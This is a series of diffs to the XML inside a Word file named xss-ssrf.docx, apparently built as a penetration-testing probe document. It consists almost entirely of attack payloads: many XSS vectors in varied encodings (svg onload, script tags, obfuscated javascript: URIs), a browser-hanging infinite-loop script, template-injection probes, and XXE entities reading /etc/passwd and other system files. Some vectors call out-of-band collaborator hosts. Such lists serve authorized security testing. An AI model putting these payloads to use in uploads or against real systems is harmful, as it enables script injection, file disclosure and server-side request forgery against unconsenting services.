--- a/xss-ssrf.docx
+++ b/xss-ssrf.docx
@@ -4,7 +4,13 @@
   <w:body>
     <w:p>
       <w:r>
-        <w:t>Test’”&gt;&lt;</w:t>
+        <w:t>Test</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>&gt;&lt;</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -12,15 +18,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/onload=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>alert(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>1)/&gt;</w:t>
+        <w:t>/onload=alert(1)/&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/xss-ssrf.docx
+++ b/xss-ssrf.docx
@@ -4,23 +4,37 @@
   <w:body>
     <w:p>
       <w:r>
-        <w:t>Test</w:t>
-      </w:r>
+        <w:t>&lt;script&gt;alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>1)&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t>'"</w:t>
       </w:r>
       <w:r>
-        <w:t>&gt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>svg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/onload=alert(1)/&gt;</w:t>
+        <w:t>&lt;script&gt;alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/script&gt;</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:t>&lt;</w:t>

--- a/xss-ssrf.docx
+++ b/xss-ssrf.docx
@@ -4,15 +4,7 @@
   <w:body>
     <w:p>
       <w:r>
-        <w:t>&lt;script&gt;alert(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1)&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/script&gt;</w:t>
+        <w:t>&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20,38 +12,297 @@
         <w:t>'"</w:t>
       </w:r>
       <w:r>
-        <w:t>&lt;script&gt;alert(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/script&gt;</w:t>
+        <w:t>&lt;script&gt;alert(2)&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> src=http://</w:t>
+        <w:t>&lt;img src=http://</w:t>
       </w:r>
       <w:r>
         <w:t>pd6ade8wv8yg7wcgabbi3p926tck0bo0.oastify.com</w:t>
       </w:r>
       <w:r>
         <w:t>/&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>&amp;apos;&amp;quot;&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;apos;&amp;quot;&amp;gt;&amp;lt;svg onload=alert(2)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;apos;&amp;quot;&gt;&amp;lt;svg onload=alert(3)&amp;gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;apos;&amp;quot;&gt;&amp;lt;svg onload=alert(4)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;!--'"&gt;&lt;--&gt;svg onload=alert(5)&lt;!--&gt;--&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;!--'"&gt;&lt;--&gt;svg onload=alert(6)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;!--'"&gt;&lt;svg onload=alert(7)&gt;--&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;![CDATA["'&gt;&lt;]]&gt;svg onload=alert(8)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;![CDATA["'&gt;&lt;]]&gt;svg onload=alert(9)&lt;![CDATA[&gt;]]&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#39;&amp;#34;&amp;#62;&amp;#60;svg onload=alert(10)&amp;#62;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#39;&amp;#34;&gt;&amp;#60;svg onload=alert(11)&amp;#62;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#39;&amp;#34;&amp;#62;&amp;#60;svg onload=alert(12)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#39;&amp;#34;&gt;&amp;#60;svg onload=alert(13)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#x0027;&amp;#x0022;&amp;#x003E;&amp;#x003C;svg onload=alert(14)&amp;#x003E;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#x0027;&amp;#x0022;&amp;#x003E;&amp;#x003C;svg onload=alert(15)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#x0027;&amp;#x0022;&gt;&amp;#x003C;svg onload=alert(16)&amp;#x003E;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#x0027;&amp;#x0022;&gt;&amp;#x003C;svg onload=alert(17)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%27%22%3E%3Csvg onload=alert(18)%3E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%27%22&gt;%3Csvg%20onload%3Dalert(19)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%27%22&gt;%3Csvg onload=alert(20)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%27%22%3E%3Csvg%20onload%3Dalert(21)%3E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%27%22%3E%3Csvg%20onload%3Dalert(22)&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert(23);&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>&lt;![CDATA[&lt;IMG SRC=x on]]&gt;&lt;![CDATA[load=alert(24);"&gt;]]&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>javascript:alert(25)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>java%0ascript:alert(26)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>java%09script:alert(27)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>java%0dscript:alert(28)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>java%0a%0dscript:alert(29)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>java%0d%0ascript:alert(30)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>\j\av\a\s\cr\i\pt\:\a\l\ert\(31\)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>javascript://%0Aalert(32)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>javascript://anything%0D%0A%0D%0Awindow.alert(33)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#51;&amp;#52;&amp;#41;&amp;#59;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#x006A;&amp;#x0061;&amp;#x0076;&amp;#x0061;&amp;#x0073;&amp;#x0063;&amp;#x0072;&amp;#x0069;&amp;#x0070;&amp;#x0074;&amp;#x003A;alert(35)&amp;#x003B;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;apos;&amp;quot;&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&amp;#x0027;&amp;#x0022;&amp;#x003E;&amp;#x003C;svg onload=alert(14)&amp;#x003E;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>%27%22%3E%3Csvg%20onload%3Dalert(21)%3E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ENTITY xxe_test \"XXE_STRING\"&gt;]&gt;","reference":""}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ENTITY xxe_canary_0 \"XXE_STRING\"&gt;]&gt;","reference":"&amp;xxe_canary_0;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY xxe_canary_2 SYSTEM \"file:///etc/lsb-release\"&gt;]&gt;","reference":"&amp;xxe_canary_2;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY xxe_canary_3 SYSTEM \"file:///etc/passwd\"&gt;]&gt;","reference":"&amp;xxe_canary_3;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\"&gt;]&gt;","reference":"&amp;xxe_canary_4;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY xxe_canary_5 SYSTEM \"file:///etc/issue\"&gt;]&gt;","reference":"&amp;xxe_canary_5;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY % xxe_canary_6 SYSTEM \"file:///etc/issue\"&gt;&lt;!ENTITY % dtd SYSTEM \"custom_domain\"&gt;%dtd;%trick;]&gt;  ]&gt;","reference":""}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ENTITY xxe_canary_0 \"XXE_STRING\"&gt;]&gt;","reference":"&amp;xxe_canary_0;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY xxe_canary_4 SYSTEM \"file:///c:/boot.ini\"&gt;]&gt;","reference":"&amp;xxe_canary_4;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY xxe_canary_5 SYSTEM \"file:///etc/issue\"&gt;]&gt;","reference":"&amp;xxe_canary_5;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY % xxe_canary_6 SYSTEM \"file:///etc/issue\"&gt;&lt;!ENTITY % dtd SYSTEM \"6fmvyndjd45a0letj7jj7dzej5pvdk.burpcollaborator.net\"&gt;%dtd;%trick;]&gt;  ]&gt;","reference":""}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{"vector":"&lt;!DOCTYPE docem [&lt;!ELEMENT docem ANY &gt;&lt;!ENTITY xxe_canary_7 SYSTEM \"http://6fmvyndjd45a0letj7jj7dzej5pvdk.burpcollaborator.net\"&gt;]&gt;","reference":"&amp;xxe_canary_7;"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{{7*7}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>${7*7}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;%= 7*7 %&gt;</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
